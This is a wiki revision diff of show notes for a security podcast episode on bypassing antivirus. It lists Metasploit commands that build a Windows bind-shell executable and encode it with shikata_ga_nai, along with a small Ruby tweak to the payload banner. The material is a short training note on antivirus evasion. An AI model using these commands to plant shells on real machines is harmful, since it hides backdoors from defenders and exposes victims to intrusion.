Difference between revisions of "Episode125"

From Security Weekly Wiki
Jump to navigationJump to search
 
Line 2: Line 2:
  
 
<pre>msfpayload windows/shell_bind_tcp LPORT=6453 X > svn-payload.exe</pre>
 
<pre>msfpayload windows/shell_bind_tcp LPORT=6453 X > svn-payload.exe</pre>
 +
 +
<pre>
 +
if (cmd =~ /^x/)
 +
                note =
 +
                        "PaulDotCom's Evil Payload\n" +
 +
                        "Payload: " + payload.refname + "\n" +
 +
                        " Length: " + buf.length.to_s + "\n" +
 +
                        "Options: " + options + "\n"
 +
</pre>
  
 
<pre>msfencode x86/shikata_ga_nai -i svn-payload.exe -t exe > svn-encode-payload.exe</pre>
 
<pre>msfencode x86/shikata_ga_nai -i svn-payload.exe -t exe > svn-encode-payload.exe</pre>

Revision as of 18:06, 29 September 2008

Tech Segment: Bypassing Anti-Virus Software The Script-Kiddie Way

msfpayload windows/shell_bind_tcp LPORT=6453 X > svn-payload.exe
 
if (cmd =~ /^x/)
                note =
                        "PaulDotCom's Evil Payload\n" +
                        "Payload: " + payload.refname + "\n" +
                        " Length: " + buf.length.to_s + "\n" +
                        "Options: " + options + "\n"
msfencode x86/shikata_ga_nai -i svn-payload.exe -t exe > svn-encode-payload.exe